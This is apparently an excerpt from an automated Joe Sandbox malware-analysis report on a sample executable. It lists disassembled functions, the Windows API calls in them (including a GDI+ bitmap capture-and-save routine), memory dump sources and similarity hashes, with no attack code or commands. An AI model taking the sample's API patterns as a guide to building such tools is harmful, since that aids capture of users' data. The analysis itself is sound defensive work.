                                                        • Instruction Fuzzy Hash: 8C318971D02656DFCB14EFA5C5816EEBBB1BF04308F04006FE80167292DB786DA5CB9A
                                                        Function 00402054 Relevance: 7.6, APIs: 5, Instructions: 80memoryfilewindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00402086
                                                        • GdipAlloc.GDIPLUS(00000010), ref: 0040208E
                                                        • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 004020A9
                                                        • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020D3
                                                        • GdiplusShutdown.GDIPLUS(?), ref: 004020FF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                        • String ID:
                                                        • API String ID: 2357751836-0
                                                        • Opcode ID: 217f5abb5afa1b455eb2dbd7401cc4696c8519af6d5153b3f711d937d629bad7
                                                        • Instruction ID: c4f18e326f444715a52338ef43c677910c1406114480214147ef42e81c070973
                                                        • Opcode Fuzzy Hash: 217f5abb5afa1b455eb2dbd7401cc4696c8519af6d5153b3f711d937d629bad7
                                                        • Instruction Fuzzy Hash: 4D2151B5A0031AAFDB10DFA5DD499AFFBB9FF48741B104036E906E3290D7759901CBA8
                                                        Function 00417940 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041275D: TlsGetValue.KERNEL32(?,?,00410B7B,00412C88,00000000,?,00410B59,?,?,?,00000000,?,00000000), ref: 00412763
                                                        • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041796A
                                                          • Part of subcall function 00420FD3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FFA
                                                          • Part of subcall function 00420FD3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00421013
                                                          • Part of subcall function 00420FD3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421089
                                                          • Part of subcall function 00420FD3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421091
                                                        • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417978
                                                        • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417982
                                                        • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041798C
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004179AA
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                        • String ID:
                                                        • API String ID: 4266703842-0
                                                        • Opcode ID: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                        • Instruction ID: 8cd570ce40639c9f8c017ae24bf7a6ba5e4898ad5d78eaa9f9672d2de087314b
                                                        • Opcode Fuzzy Hash: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                        • Instruction Fuzzy Hash: 0BF04671A0422867CE15B7229812AEEB72A9F90718F40012FF41093283DF6C9E9986CD
                                                        Function 00439E65 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 00439E7D
                                                          • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                          • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                        • _free.LIBCMT ref: 00439E8F
                                                        • _free.LIBCMT ref: 00439EA1
                                                        • _free.LIBCMT ref: 00439EB3
                                                        • _free.LIBCMT ref: 00439EC5
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                        • Instruction ID: 3df159f09b4f07c7f9cd4576f3114e9092ca915295917fe09ca5bd5d66e4921a
                                                        • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                        • Instruction Fuzzy Hash: 61F04F32409200ABC620EB59E483C1773D9BB08712F686A4FF04CDB751CBBAFC808A5D
                                                        Function 0043174A Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 00431768
                                                          • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                          • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                        • _free.LIBCMT ref: 0043177A
                                                        • _free.LIBCMT ref: 0043178D
                                                        • _free.LIBCMT ref: 0043179E
                                                        • _free.LIBCMT ref: 004317AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                        • Instruction ID: 59d86e5f81b59af28f084099f89460b905b5d9e26065712495255f22da63edd4
                                                        • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                        • Instruction Fuzzy Hash: 01F03070C003109B9A226F25AC414553B60AF2D727F04636FF4069B273C77ADA52DF8E
                                                        Function 0041CCE5 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCEF
                                                        • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD20
                                                        • GetCurrentThread.KERNEL32 ref: 0041CD29
                                                        • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD3C
                                                        • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD45
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                        • String ID:
                                                        • API String ID: 2583373041-0
                                                        • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                        • Instruction ID: c40835f97e64ecf2e035c3ed6e644cfe8c904edaac08ffe142c14ca74381b7ad
                                                        • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                        • Instruction Fuzzy Hash: 81F0AE762406109B8625FF11FD518F777759FC4715300051FE44B47551CF28A9C1D7A6
                                                        Function 0042F738 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\VAIIBIHmtT.exe,00000104), ref: 0042F773
                                                        • _free.LIBCMT ref: 0042F83E
                                                        • _free.LIBCMT ref: 0042F848
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free$FileModuleName
                                                        • String ID: C:\Users\user\Desktop\VAIIBIHmtT.exe
                                                        • API String ID: 2506810119-3541670631
                                                        • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                        • Instruction ID: 2f2bce9173a2d2ca0187e045b48802aae097e8e7c4f0e2c97b909a8c245fc2df
                                                        • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                        • Instruction Fuzzy Hash: 47319371B00228ABDB21EF99AC8189FBBFCEF95314B90407BE80497211D7749E45CB59
                                                        Function 0040EF4B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetLastError.KERNEL32(0000000D,?,0040DE66,0040C67E,?,?,00000000,?,0040C54E,0045D5E4,0040C51B,0045D5DC,?,ios_base::failbit set,0040C67E), ref: 0040EFCF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast
                                                        • String ID: 11@$f(@
                                                        • API String ID: 1452528299-1277599000
                                                        • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                        • Instruction ID: 215b6f0c2c260135b977075f1765c75d61afaaca07cd8a2d2b7a33b83608daf3
                                                        • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                        • Instruction Fuzzy Hash: 24110236204117BFCF125F62DC4456BBB65FF08712B14443AF905AB290DA749820ABD5
                                                        Function 00425F1B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • Concurrency::details::SchedulingRing::GetPseudoRRNonAffineScheduleGroupSegment.LIBCMT ref: 00425F2D
                                                          • Part of subcall function 00424EFA: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00424F17
                                                          • Part of subcall function 00424EFA: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00424F2C
                                                        • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00425F60
                                                        • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00425F8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$GroupRing::ScheduleSchedulingSegment$FindWork$AffineItemItem::NextPseudo
                                                        • String ID: 11@
                                                        • API String ID: 2684344702-1785270423
                                                        • Opcode ID: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                        • Instruction ID: cb3a2859ed7aecbb53c8f7ff5db8590c6937c5e0b26f296ff23853c6e0f13c92
                                                        • Opcode Fuzzy Hash: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                        • Instruction Fuzzy Hash: CB01DB35700629ABCF01DF54D5808AE77B9EF89354B55006AEC06DB301DA34DE05DB60
                                                        Function 0040D4EB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00411B62
                                                          • Part of subcall function 00410A71: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00410A84
                                                          • Part of subcall function 00410A71: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00410A8E
                                                        • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 00411B7B
                                                        • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411BC1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::Concurrency::details::_LockLock::_Node::QueueScoped_lock$Acquire_lockConcurrency::critical_section::_EventNodeReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter
                                                        • String ID: 11@
                                                        • API String ID: 2524916244-1785270423
                                                        • Opcode ID: c968d17d0eadf1c0e28c283ecf804fc7f7f2f76cc6bcee2e82d4d123140e7899
                                                        • Instruction ID: 77abca4beb8e4c97e8764394de2025186321a16057fa486c0768a76d67dfeb06
                                                        • Opcode Fuzzy Hash: c968d17d0eadf1c0e28c283ecf804fc7f7f2f76cc6bcee2e82d4d123140e7899
                                                        • Instruction Fuzzy Hash: D201D6359042248BDF11AB50C450BFDB372AF84714F1440AADA116B3A5DBBCBE41C799
                                                        Function 0041DA2B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA73
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041DA81
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                        • String ID: 11@$pContext
                                                        • API String ID: 1687795959-1086721755
                                                        • Opcode ID: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                        • Instruction ID: 9010ffe1b6885ba769d18c3576365b3581292a7ba769087c8389302fb8d97d4f
                                                        • Opcode Fuzzy Hash: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                        • Instruction Fuzzy Hash: B5F0593AB006159BCB04EB59DC45C5EF7A8AF85B64710007BFD01E3342CFB8EE058698
                                                        Function 00428DEC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,00431F7D), ref: 0042DFB9
                                                        • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                        • ExitThread.KERNEL32 ref: 0042DFFA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                        • String ID: f(@
                                                        • API String ID: 3213686812-2560262586
                                                        • Opcode ID: 77ac3720ff8c63f5b54c7ead9ba54d6db249791c5ee017c1279202a925d4012e
                                                        • Instruction ID: 69bc41ef776010156a50f9e736d675acab369240ea0dcafc6817c09100241395
                                                        • Opcode Fuzzy Hash: 77ac3720ff8c63f5b54c7ead9ba54d6db249791c5ee017c1279202a925d4012e
                                                        • Instruction Fuzzy Hash: 1FF0E260B8432639FA2037A2BD0BBAA16150F24B0DF96042BBE0A991C3DE9C9551416D
                                                        Function 0042DF9D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32threadCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,00431F7D), ref: 0042DFB9
                                                        • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                        • ExitThread.KERNEL32 ref: 0042DFFA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                        • String ID: f(@
                                                        • API String ID: 3213686812-2560262586
                                                        • Opcode ID: 7b9273de92e7b6936eaf880de14e0e220afece78540420b5bcfd49e854584d78
                                                        • Instruction ID: 0285dfc7d7792d99b816c6e179ba3485ab9a4e2f62b66e3f0321d916b514c371
                                                        • Opcode Fuzzy Hash: 7b9273de92e7b6936eaf880de14e0e220afece78540420b5bcfd49e854584d78
                                                        • Instruction Fuzzy Hash: EEF0557078432535FA203BA2BD0FB961A240F10B0EF56002BBF09991C3DEEC9690416D
                                                        Function 004242E7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 00424319
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042432B
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00424339
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                        • String ID: pScheduler
                                                        • API String ID: 1381464787-923244539
                                                        • Opcode ID: 34e1c130fc1cf947503754e169bfa26c3fbc22ee7f1814df8cddcc9c2b5f3f5b
                                                        • Instruction ID: dcb9093c936754fa26cda4c49a5e66a6ec85891f206a073b4e5aa53fece02954
                                                        • Opcode Fuzzy Hash: 34e1c130fc1cf947503754e169bfa26c3fbc22ee7f1814df8cddcc9c2b5f3f5b
                                                        • Instruction Fuzzy Hash: 23F0A731B0122467C718FB55E842D9E77B99E403087D0816FB802A3182CF7CA949C69D
                                                        Function 0042E05D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNEL32(00000000,00000000,?,0042E12D,00000000), ref: 0042E073
                                                        • FreeLibrary.KERNEL32(00000000,00000000,?,0042E12D,00000000), ref: 0042E082
                                                        • _free.LIBCMT ref: 0042E089
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CloseFreeHandleLibrary_free
                                                        • String ID: -B
                                                        • API String ID: 621396759-1993606306
                                                        • Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                        • Instruction ID: 17050b68875c52b9acd6c54ac6ffc846a702ed9b00f998fe1c0864977ee07d81
                                                        • Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                        • Instruction Fuzzy Hash: E9E08632101A34AFD7315F57F808B57BBD4EF15722F54C52AE41911560C7B9AD82CB9C
                                                        Function 00415DAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DDA
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DE8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                        • String ID: pScheduler$version
                                                        • API String ID: 1687795959-3154422776
                                                        • Opcode ID: 4d660d84671934de918ba001a7b24dcb35a14defb486b3a9e887b252b602c9d4
                                                        • Instruction ID: 654ef00f808b34ad7b75b8e59998346ebad61dbc4125ce9a21f33dce7aa536fc
                                                        • Opcode Fuzzy Hash: 4d660d84671934de918ba001a7b24dcb35a14defb486b3a9e887b252b602c9d4
                                                        • Instruction Fuzzy Hash: 5CE04F30900608F6CB14AA55D80ABDD77A45B11749F60C02B7855610D29ABCA6D8CB4A
                                                        Function 004358B8 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: __alldvrm$_strrchr
                                                        • String ID:
                                                        • API String ID: 1036877536-0
                                                        • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                        • Instruction ID: f9eb826db87fdf2ea4d980863b0040f81c60248b0af39ab0b887e88b27670142
                                                        • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                        • Instruction Fuzzy Hash: BEA14871A00B869FEB11DE18C8917AEFBE5EF19310F18426FE5859B381C27C9D41C799
                                                        Function 0043FA28 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: b9774af663f327122f9d753528d2dba7810faef361dd64adb4083294f63d66f0
                                                        • Instruction ID: 944ec9a8cfd15a85abea22ed7e483bbecdcf94b25d0ac16da2a86ed09b95ce29
                                                        • Opcode Fuzzy Hash: b9774af663f327122f9d753528d2dba7810faef361dd64adb4083294f63d66f0
                                                        • Instruction Fuzzy Hash: E8414771E00210AADB247BBBDC52ABF76A8EF4D334F14127BF418C6291D67C9D49826D
                                                        Function 00401FB6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShowWindow.USER32(00000005), ref: 00401FCB
                                                        • UpdateWindow.USER32 ref: 00401FD3
                                                        • ShowWindow.USER32(00000000), ref: 00401FE7
                                                        • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040204A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Window$Show$MoveUpdate
                                                        • String ID:
                                                        • API String ID: 1339878773-0
                                                        • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                        • Instruction ID: 839b3a4605fc6fa716c5a1e9d0f595454ae31d99f498b0463e76923fa4e42aa6
                                                        • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                        • Instruction Fuzzy Hash: 83016531E006109BC7258F19ED48A267BAAFFD5712B14803AF40C972B1D7B1EC42CB9C
                                                        Function 004290E9 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 00429103
                                                          • Part of subcall function 00429050: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042907F
                                                          • Part of subcall function 00429050: ___AdjustPointer.LIBCMT ref: 0042909A
                                                        • _UnwindNestedFrames.LIBCMT ref: 00429118
                                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429129
                                                        • CallCatchBlock.LIBVCRUNTIME ref: 00429151
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                        • String ID:
                                                        • API String ID: 737400349-0
                                                        • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                        • Instruction ID: c9ce71b37bf0ada561c0f38da96873ff120a9bb937dab02468c91de1f254ac1d
                                                        • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                        • Instruction Fuzzy Hash: F0018032200159BBDF12AE92DC46EEB3B69EF49758F444009FE0856121C33AEC71DBA8
                                                        Function 00434F4F Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434EF6,?,00000000,00000000,00000000,?,004351AE,00000006,FlsSetValue), ref: 00434F81
                                                        • GetLastError.KERNEL32(?,00434EF6,?,00000000,00000000,00000000,?,004351AE,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FCC), ref: 00434F8D
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434EF6,?,00000000,00000000,00000000,?,004351AE,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F9B
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad$ErrorLast
                                                        • String ID:
                                                        • API String ID: 3177248105-0
                                                        • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                        • Instruction ID: 0cc1d3989d4ca165353a689bafe11803c7becb77e2de78a39e4b2d1452c45288
                                                        • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                        • Instruction Fuzzy Hash: 2601FC366052226BC7214F69AC449A7B7D8AF8AFA1F251631F905D3240D724ED01CAE8
                                                        Function 0042614E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426168
                                                        • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042617C
                                                        • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426194
                                                        • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004261AC
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                        • String ID:
                                                        • API String ID: 78362717-0
